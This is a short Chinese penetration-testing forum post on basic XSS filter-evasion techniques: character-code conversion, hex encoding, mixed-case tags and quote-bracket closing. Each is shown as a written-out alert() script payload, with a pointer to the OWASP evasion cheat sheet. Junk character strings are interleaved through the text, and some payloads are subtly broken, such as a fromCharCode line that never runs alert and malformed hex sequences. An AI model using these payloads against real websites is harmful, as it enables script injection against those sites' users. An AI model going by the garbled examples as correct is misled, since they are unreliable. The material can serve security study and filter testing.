中国网络渗透测试联盟

标题: XSS 绕过技术 [打印本页]

作者: admin    时间: 2013-2-14 00:10
标题: XSS 绕过技术
四种超级基础的绕过方法。
$ g8 M" N3 J% I5 k- y. E, A1.转换为ASCII码/ Y# l2 J% d. N6 h$ o# @! l
例子:原脚本为<script>alert(‘I love F4ck’)</script >
1 W' p( p9 Y/ y+ S4 U6 |通过转换,变成:
% b6 w* u+ U$ A7 d# D% z5 q/ Z' d<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>5 Q6 O! T' A- `$ u

& P- i3 |; }8 i2.转换为HEX(十六进制)4 Y3 H" a$ b9 z6 T
例子:原脚本为<script>alert(‘I love F4ck’)</script>; ~, ~( S* a9 X) [: x! p7 [
通过转换,变成:
5 }6 o. [! |* L, ]%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
+ v$ z1 E  I- l# f& d) x & K+ t( D; W( q* [
3.转换脚本的大小写0 G5 G) G6 l/ _/ t: V8 Q  h
例子:原脚本为<script>alert(‘I love F4ck’)</script>' M( y" F0 Z8 r( F' x- v
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>' r: K2 I% w; e5 _) p% Z0 d( g- _) G

! D( s) v3 T* b4.增加闭合标记”>0 _* k3 D$ D: v7 B" b
例子:原脚本为<script>alert(‘I love F4ck’)</script>
- ?; p' V2 g2 p( K8 Z- _转换为:”><script>alert(‘I love F4ck’)</script>
- c0 P7 R$ h# ~. q更详细绕过技术请参考此网页& R1 a4 }" W8 k9 P" C) {
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet! d1 ]1 \2 z( e1 S
- B! a+ q1 q3 d+ G: y- r
转换工具使用的是火狐的 hackbar mozilla addon.




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2